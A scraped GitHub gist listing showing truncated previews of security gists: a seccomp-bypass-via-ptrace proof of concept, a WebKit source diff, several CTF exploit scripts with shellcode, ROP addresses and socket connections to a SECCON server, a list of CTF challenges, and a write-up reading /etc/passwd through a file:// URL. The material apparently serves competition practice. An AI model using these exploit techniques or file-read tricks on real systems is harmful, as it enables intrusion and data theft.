hhc0null hhc0null
thejh
/ seccomp_ptrace_escape.c
Last active
August 19, 2023 11:39
PoC for bypassing seccomp if ptrace is allowed (known, documented issue, even mentioned in the manpage)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <assert.h> | |
| #include <signal.h> | |
| #include <errno.h> | |
| #include <fcntl.h> | |
| #include <stddef.h> | |
| #include <sys/syscall.h> | |
| #include <sys/types.h> | |
| #include <sys/stat.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| puts "report me and you will find out" |
BenjaminPoulain
/ gist:2306122
Created
April 4, 2012 22:24
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| diff --git a/Source/JavaScriptCore/runtime/ArrayPrototype.cpp b/Source/JavaScriptCore/runtime/ArrayPrototype.cpp | |
| index 818895c..4b1278a 100644 | |
| --- a/Source/JavaScriptCore/runtime/ArrayPrototype.cpp | |
| +++ b/Source/JavaScriptCore/runtime/ArrayPrototype.cpp | |
| @@ -383,7 +383,7 @@ EncodedJSValue JSC_HOST_CALL arrayProtoFuncJoin(ExecState* exec) | |
| UString separator; | |
| if (!exec->argument(0).isUndefined()) | |
| - separator = exec->argument(0).toString(exec)->value(exec); | |
| + separator = fastJSValuetoUString(exec->argument(0), exec); |
potetisensei
/ rop_impossible.py
Created
December 7, 2014 09:45
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from socket import * | |
| from struct import pack, unpack | |
| from commands import getoutput | |
| from time import sleep | |
| buf_clone = 0x080CB960 | |
| p = socket(AF_INET, SOCK_STREAM) | |
| p.connect(("ropi.pwn.seccon.jp", 10000)) |
zzoru
/ tinypad.py
Created
December 15, 2016 00:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| '''' | |
| PwnPineappleApplePwn | |
| https://www.youtube.com/watch?v=0E00Zuayv9Q | |
| '''' | |
| from pwn import * | |
| context.arch = 'amd64' | |
| #context.log_level = 'debug' | |
| p = process('./tinypad') |
potetisensei
/ gist:09b7265bc95dfb000a7c
Last active
August 29, 2015 14:24
for this: http://shindanmaker.com/549065 TODO: append CODEGATE 2014 Finals, SECUINSIDE 2014 Finals, DEFCON 2014 Finals, and so on
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PlaidDB - Plaid 2015 | |
| Prodmanager - Plaid 2015 | |
| qttpd - Plaid 2015 | |
| tp - Plaid 2015 | |
| traveller - Plaid 2015 | |
| Weff - CODEGATE 2015 | |
| icbm - CODEGATE 2015 | |
| beef_steak - CODEGATE 2015 | |
| Bookstore - CODEGATE 2015 | |
| Olive and Mushroom Pizza - CODEGATE 2015 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from nulllife import * | |
| import struct | |
| shellcode = NullShell(name = 'exec', arch = 'x86', os = 'linux').get() | |
| stack_chk_got = 0x0804A018 | |
| message_data = 0x0804A070 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from struct import * | |
| from nulllife import * | |
| new_ebp = 0x0804a100 | |
| plt_read = 0x080483E0 | |
| plt_open = 0x08048420 | |
| plt_write = 0x08048450 | |
| flag_str = 0x080487D0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #DIAGCGI | |
| ##Arbitrary File Read | |
| ```file:///etc/passwd``` and use curl function shows us | |
| ``` | |
| root:x:0:0:root:/root:/bin/bash | |
| daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | |
| bin:x:2:2:bin:/bin:/usr/sbin/nologin |